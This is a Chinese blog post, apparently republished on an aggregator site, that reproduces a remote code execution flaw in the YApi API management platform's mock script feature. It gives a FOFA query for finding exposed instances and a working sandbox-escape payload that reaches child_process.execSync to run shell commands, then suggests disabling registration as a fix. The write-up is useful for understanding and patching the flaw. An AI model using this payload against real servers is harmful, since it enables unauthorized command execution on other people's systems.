Yapi Mock 遠程代碼執行漏洞

跟風一波復現Yapi

漏洞描述:

YApi接口管理平臺遠程代碼執行0day漏洞,攻擊者可通過平臺注冊用戶添加接口,設置mock腳本從而執行任意代碼。鑒于該漏洞目前處于0day漏洞利用狀態,強烈建議客戶盡快采取緩解措施以避免受此漏洞影響

fofa:

Fofa:app="YApi"

漏洞復現:

在這里插入圖片描述
默認注冊功能開啟。
注冊后創建項目:在這里插入圖片描述
添加接口:在這里插入圖片描述
創建接口成功:
在這里插入圖片描述
選擇“高級Mock”,“腳本”,開啟腳本:
在這里插入圖片描述
寫入poc并保存:

const sandbox = this
const ObjectConstructor = this.constructor
const FunctionConstructor = ObjectConstructor.constructor
const myfun = FunctionConstructor('return process')
const process = myfun()
mockJson = process.mainModule.require("child_process").execSync("whoami && ps -ef").toString()

預覽:在這里插入圖片描述
效果:在這里插入圖片描述
Yapi作者已經停止更新。臨時修復建議禁止用戶注冊,具體配置參考原文鏈接:
https://github.com/YMFE/yapi/issues/2099

看完點贊關注不迷路!!! 后續繼續更新優質安全內容!!!

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/news/532573.shtml
繁體地址,請注明出處:http://hk.pswp.cn/news/532573.shtml
英文地址,請注明出處:http://en.pswp.cn/news/532573.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

C++ ACM模式輸入輸出

C++ ACM模式輸入輸出

C ACM模式輸入輸出 以下我們都以求和作為題目要求,來看一下各種輸入輸出應該怎么寫。 1 只有一個或幾個輸入 輸入樣例: 3 5 7輸入輸出模板: int main() {int a, b, c;// 接收有限個輸入cin >> a >> b >> c;// 輸出結果…
閱讀更多...
CVE-2017-10271 WebLogic XMLDecoder反序列化漏洞

CVE-2017-10271 WebLogic XMLDecoder反序列化漏洞

漏洞產生原因: CVE-2017-10271漏洞產生的原因大致是Weblogic的WLS Security組件對外提供webservice服務,其中使用了XMLDecoder來解析用戶傳入的XML數據,在解析的過程中出現反序列化漏洞,導致可執行任意命令。攻擊者發送精心構造的…
閱讀更多...
樹莓派攝像頭 C++ OpenCV YoloV3 實現實時目標檢測

樹莓派攝像頭 C++ OpenCV YoloV3 實現實時目標檢測

樹莓派攝像頭 C OpenCV YoloV3 實現實時目標檢測 本文將實現樹莓派攝像頭 C OpenCV YoloV3 實現實時目標檢測,我們會先實現樹莓派對視頻文件的逐幀檢測來驗證算法流程,成功后,再接入攝像頭進行實時目標檢測。 先聲明一下筆者的主要軟硬件配…
閱讀更多...
【實戰】記錄一次服務器挖礦病毒處理

【實戰】記錄一次服務器挖礦病毒處理

信息收集及kill: 查看監控顯示長期CPU利用率超高,懷疑中了病毒 top 命令查看進程資源占用: netstat -lntupa 命令查看有無ip進行發包 netstat -antp 然而并沒有找到對應的進程名 查看java進程和solr進程 ps aux :查看所有進程…
閱讀更多...
ag 搜索工具參數詳解

ag 搜索工具參數詳解

ag 搜索工具參數詳解 Ag 是類似ack, grep的工具,它來在文件中搜索相應關鍵字。 官方列出了幾點選擇它的理由: 它比ack還要快 (和grep不在一個數量級上)它會忽略.gitignore和.hgignore中的匹配文件如果有你想忽略的文…
閱讀更多...
CVE-2013-4547 文件名邏輯漏洞

CVE-2013-4547 文件名邏輯漏洞

搭建環境,訪問 8080 端口 漏洞說明: Nginx: Nginx是一款輕量級的Web 服務器/反向代理服務器及電子郵件(IMAP/POP3)代理服務器,在BSD-like 協議下發行。其特點是占有內存少,并發能力強&#xf…
閱讀更多...
CMake指令入門 ——以構建OpenCV項目為例

CMake指令入門 ——以構建OpenCV項目為例

CMake指令入門 ——以構建OpenCV項目為例 轉自:https://blog.csdn.net/sandalphon4869/article/details/100589747 一、安裝 sudo apt-get install cmake安裝好后,輸入 cmake -version如果出現了cmake的版本顯示,那么說明安裝成功 二、c…
閱讀更多...
CVE-2017-7529Nginx越界讀取緩存漏洞POC

CVE-2017-7529Nginx越界讀取緩存漏洞POC

漏洞影響 低危,造成信息泄露,暴露真實ip等 實驗內容 漏洞原理 通過查看patch確定問題是由于對http header中range域處理不當造成,焦點在ngx_http_range_parse 函數中的循環: HTTP頭部range域的內容大約為Range: bytes4096-81…
閱讀更多...
Linux命令行性能監控工具大全

Linux命令行性能監控工具大全

Linux命令行性能監控工具大全 作者:Arnold Lu 原文:https://www.cnblogs.com/arnoldlu/p/9462221.html 關鍵詞:top、perf、sar、ksar、mpstat、uptime、vmstat、pidstat、time、cpustat、munin、htop、glances、atop、nmon、pcp-gui、collect…
閱讀更多...
Weblogic12c T3 協議安全漏洞分析【CVE-2020-14645 CVE-2020-2883 CVE-2020-14645】

Weblogic12c T3 協議安全漏洞分析【CVE-2020-14645 CVE-2020-2883 CVE-2020-14645】

給個關注?寶兒! 給個關注?寶兒! 給個關注?寶兒! 關注公眾號:b1gpig信息安全,文章推送不錯過 ## 前言 WebLogic是美國Oracle公司出品的一個application server,確切的說是一個基于JAV…
閱讀更多...
Getshell總結

Getshell總結

按方式分類: 0x01注入getshell: 0x02 上傳 getwebshell 0x03 RCE getshell 0x04 包含getwebshell 0x05 漏洞組合拳getshell 0x06 系統層getcmdshell 0x07 釣魚 getcmdshell 0x08 cms后臺getshell 0x09 紅隊shell競爭分析 0x01注入getshell:…
閱讀更多...
編寫可靠bash腳本的一些技巧

編寫可靠bash腳本的一些技巧

編寫可靠bash腳本的一些技巧 原作者:騰訊技術工程 原文鏈接:https://zhuanlan.zhihu.com/p/123989641 寫過很多 bash 腳本的人都知道,bash 的坑不是一般的多。 其實 bash 本身并不是一個很嚴謹的語言,但是很多時候也不得不用。以下…
閱讀更多...
python 到 poc

python 到 poc

0x01 特殊函數 0x02 模塊 0x03 小工具開發記錄 特殊函數 # -*- coding:utf-8 -*- #內容見POC.demo; POC.demo2 ;def add(x,y):axyprint(a)add(3,5) print(------------引入lambad版本:) add lambda x,y : xy print(add(3,5)) #lambda函數,在lambda函數后面直接…
閱讀更多...
protobuf版本常見問題

protobuf版本常見問題

protobuf版本常見問題 許多軟件都依賴 google 的 protobuf,我們很有可能在安裝多個軟件時重復安裝了多個版本的 protobuf,它們之間很可能出現沖突并導致在后續的工作中出現版本不匹配之類的錯誤。本文將討論筆者在使用 protobuf 中遇到的一些問題&#…
閱讀更多...
CMake常用命令整理

CMake常用命令整理

CMake常用命令整理 轉自:https://zhuanlan.zhihu.com/p/315768216 CMake 是什么我就不用再多說什么了,相信大家都有接觸才會看一篇文章。對于不太熟悉的開發人員可以把這篇文章當個查找手冊。 1.CMake語法 1.1 指定cmake的最小版本 cmake_minimum_r…
閱讀更多...
CVE-2021-41773 CVE-2021-42013 Apache HTTPd最新RCE漏洞復現 目錄穿越漏洞

CVE-2021-41773 CVE-2021-42013 Apache HTTPd最新RCE漏洞復現 目錄穿越漏洞

給個關注?寶兒! 給個關注?寶兒! 給個關注?寶兒! CVE-2021-41773漏洞描述: Apache HTTPd是Apache基金會開源的一款流行的HTTP服務器。2021年10月8日Apache HTTPd官方發布安全更新,披…
閱讀更多...
SSRF,以weblogic為案例

SSRF,以weblogic為案例

給個關注?寶兒! 給個關注?寶兒! 給個關注?寶兒! 復習一下ssrf的原理及危害,并且以weblog的ssrf漏洞為案例 漏洞原理 SSRF(Server-side Request Forge, 服務端請求偽造) 通常用于控制web進而…
閱讀更多...
C++11 右值引用、移動語義、完美轉發、萬能引用

C++11 右值引用、移動語義、完美轉發、萬能引用

C11 右值引用、移動語義、完美轉發、引用折疊、萬能引用 轉自:http://c.biancheng.net/ C中的左值和右值 右值引用可以從字面意思上理解,指的是以引用傳遞(而非值傳遞)的方式使用 C 右值。關于 C 引用,已經在《C引用…
閱讀更多...
C++11 std::function, std::bind, std::ref, std::cref

C++11 std::function, std::bind, std::ref, std::cref

C11 std::function, std::bind, std::ref, std::cref 轉自&#xff1a;http://www.jellythink.com/ std::function 看看這段代碼 先來看看下面這兩行代碼&#xff1a; std::function<void(EventKeyboard::KeyCode, Event*)> onKeyPressed; std::function<void(Ev…
閱讀更多...
Java安全(一) : java類 | 反射

Java安全(一) : java類 | 反射

給個關注&#xff1f;寶兒&#xff01; 給個關注&#xff1f;寶兒&#xff01; 給個關注&#xff1f;寶兒&#xff01; 1.java基礎 Java平臺共分為三個主要版本Java SE&#xff08;Java Platform, Standard Edition&#xff0c;Java平臺標準版&#xff09;、Java EE&#xff0…
閱讀更多...
最新文章

Copyright @ 2022~2023